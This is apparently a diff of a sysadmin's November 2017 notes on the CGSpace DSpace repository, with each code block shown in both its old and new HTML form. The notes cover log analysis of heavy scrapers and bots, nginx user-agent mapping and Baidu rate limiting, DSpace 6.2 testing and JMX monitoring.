<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;07/Nov/2017:0[2-8]&#39; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
279 66.249.66.91
373 65.49.68.199
446 68.180.229.254
@ -364,7 +364,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>Of those, most are Google, Bing, Yahoo, etc, except 63.143.42.244 and 63.143.42.242 which are Uptime Robot</li>
<li>Here are the top IPs making requests to REST from 2 to 8 AM:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#39;07/Nov/2017:0[2-8]&#39; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
8 207.241.229.237
10 66.249.66.90
16 104.196.152.243
@ -377,14 +377,14 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</code></pre><ul>
<li>The OAI requests during that same time period are nothing to worry about:</li>
</ul>
<pre><code># cat /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#39;07/Nov/2017:0[2-8]&#39; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
1 66.249.66.92
4 66.249.66.90
6 68.180.229.254
</code></pre><ul>
<li>The top IPs from dspace.log during the 28 AM period:</li>
</ul>
<pre><code>$ grep -E '2017-11-07 0[2-8]' dspace.log.2017-11-07 | grep -o -E 'ip_addr=[0-9.]+' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code>$ grep -E &#39;2017-11-07 0[2-8]&#39; dspace.log.2017-11-07 | grep -o -E &#39;ip_addr=[0-9.]+&#39; | sort -n | uniq -c | sort -h | tail
143 ip_addr=213.55.99.121
181 ip_addr=66.249.66.91
223 ip_addr=157.55.39.161
@ -400,7 +400,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>The number of requests isn&rsquo;t even that high to be honest</li>
<li>As I was looking at these logs I noticed another heavy user (124.17.34.59) that was not active during this time period, but made many requests today alone:</li>
</ul>
<pre><code># zgrep -c 124.17.34.59 /var/log/nginx/access.log*
<pre tabindex="0"><code># zgrep -c 124.17.34.59 /var/log/nginx/access.log*
/var/log/nginx/access.log:22581
/var/log/nginx/access.log.1:0
/var/log/nginx/access.log.2.gz:14
@ -414,9 +414,9 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</code></pre><ul>
<li>The whois data shows the IP is from China, but the user agent doesn&rsquo;t really give any clues:</li>
</ul>
<pre><code># grep 124.17.34.59 /var/log/nginx/access.log | awk -F'&quot; ' '{print $3}' | sort | uniq -c | sort -h
210 &quot;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36&quot;
22610 &quot;Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)&quot;
<pre tabindex="0"><code># grep 124.17.34.59 /var/log/nginx/access.log | awk -F&#39;&#34; &#39; &#39;{print $3}&#39; | sort | uniq -c | sort -h
210 &#34;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36&#34;
22610 &#34;Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)&#34;
</code></pre><ul>
<li>A Google search for &ldquo;LCTE bot&rdquo; doesn&rsquo;t return anything interesting, but this <a href="https://stackoverflow.com/questions/42500881/what-is-lcte-in-user-agent">Stack Overflow discussion</a> references the lack of information</li>
<li>So basically after a few hours of looking at the log files I am not closer to understanding what is going on!</li>
@ -424,7 +424,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>And as we speak Linode alerted that the outbound traffic rate is very high for the past two hours (about 1214 hours)</li>
<li>At least for now it seems to be that new Chinese IP (124.17.34.59):</li>
</ul>
<pre><code># grep -E &quot;07/Nov/2017:1[234]:&quot; /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># grep -E &#34;07/Nov/2017:1[234]:&#34; /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
198 207.46.13.103
203 207.46.13.80
205 207.46.13.36
@ -438,17 +438,17 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</code></pre><ul>
<li>Seems 124.17.34.59 are really downloading all our PDFs, compared to the next top active IPs during this time!</li>
</ul>
<pre><code># grep -E &quot;07/Nov/2017:1[234]:&quot; /var/log/nginx/access.log | grep 124.17.34.59 | grep -c pdf
<pre tabindex="0"><code># grep -E &#34;07/Nov/2017:1[234]:&#34; /var/log/nginx/access.log | grep 124.17.34.59 | grep -c pdf
5948
# grep -E &quot;07/Nov/2017:1[234]:&quot; /var/log/nginx/access.log | grep 104.196.152.243 | grep -c pdf
# grep -E &#34;07/Nov/2017:1[234]:&#34; /var/log/nginx/access.log | grep 104.196.152.243 | grep -c pdf
0
</code></pre><ul>
<li>About CIAT, I think I need to encourage them to specify a user agent string for their requests, because they are not reuising their Tomcat session and they are creating thousands of sessions per day</li>
<li>All CIAT requests vs unique ones:</li>
</ul>
<pre><code>$ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | wc -l
<pre tabindex="0"><code>$ grep -Io -E &#39;session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243&#39; dspace.log.2017-11-07 | wc -l
3506
$ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | sort | uniq | wc -l
$ grep -Io -E &#39;session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243&#39; dspace.log.2017-11-07 | sort | uniq | wc -l
3506
</code></pre><ul>
<li>I emailed CIAT about the session issue, user agent issue, and told them they should not scrape the HTML contents of communities, instead using the REST API</li>
@ -459,18 +459,18 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
<ul>
<li>But they literally just made this request today:</li>
</ul>
<pre><code>180.76.15.136 - - [07/Nov/2017:06:25:11 +0000] &quot;GET /discover?filtertype_0=crpsubject&amp;filter_relational_operator_0=equals&amp;filter_0=WATER%2C+LAND+AND+ECOSYSTEMS&amp;filtertype=subject&amp;filter_relational_operator=equals&amp;filter=WATER+RESOURCES HTTP/1.1&quot; 200 82265 &quot;-&quot; &quot;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&quot;
<pre tabindex="0"><code>180.76.15.136 - - [07/Nov/2017:06:25:11 +0000] &#34;GET /discover?filtertype_0=crpsubject&amp;filter_relational_operator_0=equals&amp;filter_0=WATER%2C+LAND+AND+ECOSYSTEMS&amp;filtertype=subject&amp;filter_relational_operator=equals&amp;filter=WATER+RESOURCES HTTP/1.1&#34; 200 82265 &#34;-&#34; &#34;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#34;
</code></pre><ul>
<li>Along with another thousand or so requests to URLs that are forbidden in robots.txt today alone:</li>
</ul>
<pre><code># grep -c Baiduspider /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c Baiduspider /var/log/nginx/access.log
3806
# grep Baiduspider /var/log/nginx/access.log | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
# grep Baiduspider /var/log/nginx/access.log | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
1085
</code></pre><ul>
<li>I will think about blocking their IPs but they have 164 of them!</li>
</ul>
<pre><code># grep &quot;Baiduspider/2.0&quot; /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep &#34;Baiduspider/2.0&#34; /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort -n | uniq | wc -l
164
</code></pre><h2 id="2017-11-08">2017-11-08</h2>
<ul>
@ -478,12 +478,12 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
<li>Linode sent another alert about CPU usage in the morning at 6:12AM</li>
<li>Jesus, the new Chinese IP (124.17.34.59) has downloaded 24,000 PDFs in the last 24 hours:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;0[78]/Nov/2017:&quot; | grep 124.17.34.59 | grep -v pdf.jpg | grep -c pdf
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;0[78]/Nov/2017:&#34; | grep 124.17.34.59 | grep -v pdf.jpg | grep -c pdf
24981
</code></pre><ul>
<li>This is about 20,000 Tomcat sessions:</li>
</ul>
<pre><code>$ cat dspace.log.2017-11-07 dspace.log.2017-11-08 | grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=124.17.34.59' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2017-11-07 dspace.log.2017-11-08 | grep -Io -E &#39;session_id=[A-Z0-9]{32}:ip_addr=124.17.34.59&#39; | sort | uniq | wc -l
20733
</code></pre><ul>
<li>I&rsquo;m getting really sick of this</li>
@ -496,16 +496,16 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
<li>Some clients send thousands of requests without a user agent which ends up creating thousands of Tomcat sessions, wasting precious memory, CPU, and database resources in the process</li>
<li>Basically, we modify the nginx config to add a mapping with a modified user agent <code>$ua</code>:</li>
</ul>
<pre><code>map $remote_addr $ua {
<pre tabindex="0"><code>map $remote_addr $ua {
# 2017-11-08 Random Chinese host grabbing 20,000 PDFs
124.17.34.59 'ChineseBot';
124.17.34.59 &#39;ChineseBot&#39;;
default $http_user_agent;
}
</code></pre><ul>
<li>If the client&rsquo;s address matches then the user agent is set, otherwise the default <code>$http_user_agent</code> variable is used</li>
<li>Then, in the server&rsquo;s <code>/</code> block we pass this header to Tomcat:</li>
</ul>
<pre><code>proxy_pass http://tomcat_http;
<pre tabindex="0"><code>proxy_pass http://tomcat_http;
proxy_set_header User-Agent $ua;
</code></pre><ul>
<li>Note to self: the <code>$ua</code> variable won&rsquo;t show up in nginx access logs because the default <code>combined</code> log format doesn&rsquo;t show it, so don&rsquo;t run around pulling your hair out wondering with the modified user agents aren&rsquo;t showing in the logs!</li>
@ -516,14 +516,14 @@ proxy_set_header User-Agent $ua;
<li>I merged the clickable thumbnails code to <code>5_x-prod</code> (<a href="https://github.com/ilri/DSpace/pull/347">#347</a>) and will deploy it later along with the new bot mapping stuff (and re-run the Asible <code>nginx</code> and <code>tomcat</code> tags)</li>
<li>I was thinking about Baidu again and decided to see how many requests they have versus Google to URL paths that are explicitly forbidden in <code>robots.txt</code>:</li>
</ul>
<pre><code># zgrep Baiduspider /var/log/nginx/access.log* | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
<pre tabindex="0"><code># zgrep Baiduspider /var/log/nginx/access.log* | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
22229
# zgrep Googlebot /var/log/nginx/access.log* | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
# zgrep Googlebot /var/log/nginx/access.log* | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
0
</code></pre><ul>
<li>It seems that they rarely even bother checking <code>robots.txt</code>, but Google does multiple times per day!</li>
</ul>
<pre><code># zgrep Baiduspider /var/log/nginx/access.log* | grep -c robots.txt
<pre tabindex="0"><code># zgrep Baiduspider /var/log/nginx/access.log* | grep -c robots.txt
14
# zgrep Googlebot /var/log/nginx/access.log* | grep -c robots.txt
1134
@ -538,20 +538,20 @@ proxy_set_header User-Agent $ua;
<ul>
<li>Awesome, it seems my bot mapping stuff in nginx actually reduced the number of Tomcat sessions used by the CIAT scraper today, total requests and unique sessions:</li>
</ul>
<pre><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Nov/2017' | grep -c 104.196.152.243
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#39;09/Nov/2017&#39; | grep -c 104.196.152.243
8956
$ grep 104.196.152.243 dspace.log.2017-11-09 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-09 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
223
</code></pre><ul>
<li>Versus the same stats for yesterday and the day before:</li>
</ul>
<pre><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '08/Nov/2017' | grep -c 104.196.152.243
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#39;08/Nov/2017&#39; | grep -c 104.196.152.243
10216
$ grep 104.196.152.243 dspace.log.2017-11-08 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-08 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2592
# zcat -f -- /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep '07/Nov/2017' | grep -c 104.196.152.243
# zcat -f -- /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep &#39;07/Nov/2017&#39; | grep -c 104.196.152.243
8120
$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
3506
</code></pre><ul>
<li>The number of sessions is over <em>ten times less</em>!</li>
@ -569,7 +569,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{3
<li>Update the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure templates</a> to be a little more modular and flexible</li>
<li>Looking at the top client IPs on CGSpace so far this morning, even though it&rsquo;s only been eight hours:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;12/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;12/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
243 5.83.120.111
335 40.77.167.103
424 66.249.66.91
@ -583,27 +583,27 @@ $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{3
</code></pre><ul>
<li>5.9.6.51 seems to be a Russian bot:</li>
</ul>
<pre><code># grep 5.9.6.51 /var/log/nginx/access.log | tail -n 1
5.9.6.51 - - [12/Nov/2017:08:13:13 +0000] &quot;GET /handle/10568/16515/recent-submissions HTTP/1.1&quot; 200 5097 &quot;-&quot; &quot;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&quot;
<pre tabindex="0"><code># grep 5.9.6.51 /var/log/nginx/access.log | tail -n 1
5.9.6.51 - - [12/Nov/2017:08:13:13 +0000] &#34;GET /handle/10568/16515/recent-submissions HTTP/1.1&#34; 200 5097 &#34;-&#34; &#34;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&#34;
</code></pre><ul>
<li>What&rsquo;s amazing is that it seems to reuse its Java session across all requests:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2017-11-12
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2017-11-12
1558
$ grep 5.9.6.51 dspace.log.2017-11-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 5.9.6.51 dspace.log.2017-11-12 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1
</code></pre><ul>
<li>Bravo to MegaIndex.ru!</li>
<li>The same cannot be said for 95.108.181.88, which appears to be YandexBot, even though Tomcat&rsquo;s Crawler Session Manager valve regex should match &lsquo;YandexBot&rsquo;:</li>
</ul>
<pre><code># grep 95.108.181.88 /var/log/nginx/access.log | tail -n 1
95.108.181.88 - - [12/Nov/2017:08:33:17 +0000] &quot;GET /bitstream/handle/10568/57004/GenebankColombia_23Feb2015.pdf HTTP/1.1&quot; 200 972019 &quot;-&quot; &quot;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&quot;
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2017-11-12
<pre tabindex="0"><code># grep 95.108.181.88 /var/log/nginx/access.log | tail -n 1
95.108.181.88 - - [12/Nov/2017:08:33:17 +0000] &#34;GET /bitstream/handle/10568/57004/GenebankColombia_23Feb2015.pdf HTTP/1.1&#34; 200 972019 &#34;-&#34; &#34;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#34;
$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88&#39; dspace.log.2017-11-12
991
</code></pre><ul>
<li>Move some items and collections on CGSpace for Peter Ballantyne, running <a href="https://gist.github.com/alanorth/e60b530ed4989df0c731afbb0c640515"><code>move_collections.sh</code></a> with the following configuration:</li>
</ul>
<pre><code>10947/6 10947/1 10568/83389
<pre tabindex="0"><code>10947/6 10947/1 10568/83389
10947/34 10947/1 10568/83389
10947/2512 10947/1 10568/83389
</code></pre><ul>
@ -612,7 +612,7 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2017-11-
<li>The solution <a href="https://github.com/ilri/rmg-ansible-public/commit/f0646991772660c505bea9c5ac586490e7c86156">I came up with</a> uses tricks from both of those</li>
<li>I deployed the limit on CGSpace and DSpace Test and it seems to work well:</li>
</ul>
<pre><code>$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
<pre tabindex="0"><code>$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:&#39;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@ -627,7 +627,7 @@ X-Cocoon-Version: 2.2.0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:&#39;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
HTTP/1.1 503 Service Temporarily Unavailable
Connection: keep-alive
Content-Length: 206
@ -642,9 +642,9 @@ Server: nginx
<ul>
<li>At the end of the day I checked the logs and it really looks like the Baidu rate limiting is working, HTTP 200 vs 503:</li>
</ul>
<pre><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;13/Nov/2017&quot; | grep &quot;Baiduspider&quot; | grep -c &quot; 200 &quot;
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;13/Nov/2017&#34; | grep &#34;Baiduspider&#34; | grep -c &#34; 200 &#34;
1132
# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;13/Nov/2017&quot; | grep &quot;Baiduspider&quot; | grep -c &quot; 503 &quot;
# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;13/Nov/2017&#34; | grep &#34;Baiduspider&#34; | grep -c &#34; 503 &#34;
10105
</code></pre><ul>
<li>Helping Sisay proof 47 records for IITA: <a href="https://dspacetest.cgiar.org/handle/10568/97029">https://dspacetest.cgiar.org/handle/10568/97029</a></li>
@ -675,7 +675,7 @@ Server: nginx
<li>Started testing DSpace 6.2 and a few things have changed</li>
<li>Now PostgreSQL needs <code>pgcrypto</code>:</li>
</ul>
<pre><code>$ psql dspace6
<pre tabindex="0"><code>$ psql dspace6
dspace6=# CREATE EXTENSION pgcrypto;
</code></pre><ul>
<li>Also, local settings are no longer in <code>build.properties</code>, they are now in <code>local.cfg</code></li>
@ -695,7 +695,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
<li>After a few minutes the connecitons went down to 44 and CGSpace was kinda back up, it seems like Tsega restarted Tomcat</li>
<li>Looking at the REST and XMLUI log files, I don&rsquo;t see anything too crazy:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep &quot;17/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep &#34;17/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
13 66.249.66.223
14 207.46.13.36
17 207.46.13.137
@ -706,7 +706,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
1400 70.32.83.92
1503 50.116.102.77
6037 45.5.184.196
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;17/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;17/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
325 139.162.247.24
354 66.249.66.223
422 207.46.13.36
@ -721,7 +721,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
<li>I need to look into using JMX to analyze active sessions I think, rather than looking at log files</li>
<li>After adding appropriate <a href="https://geekflare.com/enable-jmx-tomcat-to-monitor-administer/">JMX listener options to Tomcat&rsquo;s JAVA_OPTS</a> and restarting Tomcat, I can connect remotely using an SSH dynamic port forward (SOCKS) on port 7777 for example, and then start jconsole locally like:</li>
</ul>
<pre><code>$ jconsole -J-DsocksProxyHost=localhost -J-DsocksProxyPort=7777 service:jmx:rmi:///jndi/rmi://localhost:9000/jmxrmi -J-DsocksNonProxyHosts=
<pre tabindex="0"><code>$ jconsole -J-DsocksProxyHost=localhost -J-DsocksProxyPort=7777 service:jmx:rmi:///jndi/rmi://localhost:9000/jmxrmi -J-DsocksNonProxyHosts=
</code></pre><ul>
<li>Looking at the MBeans you can drill down in Catalina→Manager→webapp→localhost→Attributes and see active sessions, etc</li>
<li>I want to enable JMX listener on CGSpace but I need to do some more testing on DSpace Test and see if it causes any performance impact, for example</li>
@ -737,7 +737,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
<li>Linode sent an alert that CGSpace was using a lot of CPU around 46 AM</li>
<li>Looking in the nginx access logs I see the most active XMLUI users between 4 and 6 AM:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;19/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;19/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
111 66.249.66.155
171 5.9.6.51
188 54.162.241.40
@ -751,12 +751,12 @@ dspace6=# CREATE EXTENSION pgcrypto;
</code></pre><ul>
<li>66.249.66.153 appears to be Googlebot:</li>
</ul>
<pre><code>66.249.66.153 - - [19/Nov/2017:06:26:01 +0000] &quot;GET /handle/10568/2203 HTTP/1.1&quot; 200 6309 &quot;-&quot; &quot;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&quot;
<pre tabindex="0"><code>66.249.66.153 - - [19/Nov/2017:06:26:01 +0000] &#34;GET /handle/10568/2203 HTTP/1.1&#34; 200 6309 &#34;-&#34; &#34;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#34;
</code></pre><ul>
<li>We know Googlebot is persistent but behaves well, so I guess it was just a coincidence that it came at a time when we had other traffic and server activity</li>
<li>In related news, I see an Atmire update process going for many hours and responsible for hundreds of thousands of log entries (two thirds of all log entries)</li>
</ul>
<pre><code>$ wc -l dspace.log.2017-11-19
<pre tabindex="0"><code>$ wc -l dspace.log.2017-11-19
388472 dspace.log.2017-11-19
$ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
267494
@ -764,7 +764,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>WTF is this process doing every day, and for so many hours?</li>
<li>In unrelated news, when I was looking at the DSpace logs I saw a bunch of errors like this:</li>
</ul>
<pre><code>2017-11-19 03:00:32,806 INFO org.apache.pdfbox.pdfparser.PDFParser @ Document is encrypted
<pre tabindex="0"><code>2017-11-19 03:00:32,806 INFO org.apache.pdfbox.pdfparser.PDFParser @ Document is encrypted
2017-11-19 03:00:32,807 ERROR org.apache.pdfbox.filter.FlateFilter @ FlateFilter: stop reading corrupt stream due to a DataFormatException
</code></pre><ul>
<li>It&rsquo;s been a few days since I enabled the G1GC on DSpace Test and the JVM graph definitely changed:</li>
@ -780,13 +780,13 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<ul>
<li>Magdalena was having problems logging in via LDAP and it seems to be a problem with the CGIAR LDAP server:</li>
</ul>
<pre><code>2017-11-21 11:11:09,621 WARN org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=2FEC0E5286C17B6694567FFD77C3171C:ip_addr=77.241.141.58:ldap_authentication:type=failed_auth javax.naming.CommunicationException\colon; simple bind failed\colon; svcgroot2.cgiarad.org\colon;3269 [Root exception is javax.net.ssl.SSLHandshakeException\colon; sun.security.validator.ValidatorException\colon; PKIX path validation failed\colon; java.security.cert.CertPathValidatorException\colon; validity check failed]
<pre tabindex="0"><code>2017-11-21 11:11:09,621 WARN org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=2FEC0E5286C17B6694567FFD77C3171C:ip_addr=77.241.141.58:ldap_authentication:type=failed_auth javax.naming.CommunicationException\colon; simple bind failed\colon; svcgroot2.cgiarad.org\colon;3269 [Root exception is javax.net.ssl.SSLHandshakeException\colon; sun.security.validator.ValidatorException\colon; PKIX path validation failed\colon; java.security.cert.CertPathValidatorException\colon; validity check failed]
</code></pre><h2 id="2017-11-22">2017-11-22</h2>
<ul>
<li>Linode sent an alert that the CPU usage on the CGSpace server was very high around 4 to 6 AM</li>
<li>The logs don&rsquo;t show anything particularly abnormal between those hours:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;22/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;22/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
136 31.6.77.23
174 68.180.229.254
217 66.249.66.91
@ -807,7 +807,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>Linode alerted again that CPU usage was high on CGSpace from 4:13 to 6:13 AM</li>
<li>I see a lot of Googlebot (66.249.66.90) in the XMLUI access logs</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;23/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;23/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
88 66.249.66.91
140 68.180.229.254
155 54.196.2.131
@ -821,7 +821,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
</code></pre><ul>
<li>&hellip; and the usual REST scrapers from CIAT (45.5.184.196) and CCAFS (70.32.83.92):</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &quot;23/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#34;23/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
5 190.120.6.219
6 104.198.9.108
14 104.196.152.243
@ -836,7 +836,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>These IPs crawling the REST API don&rsquo;t specify user agents and I&rsquo;d assume they are creating many Tomcat sessions</li>
<li>I would catch them in nginx to assign a &ldquo;bot&rdquo; user agent to them so that the Tomcat Crawler Session Manager valve could deal with them, but they seem to create any reallyat least not in the dspace.log:</li>
</ul>
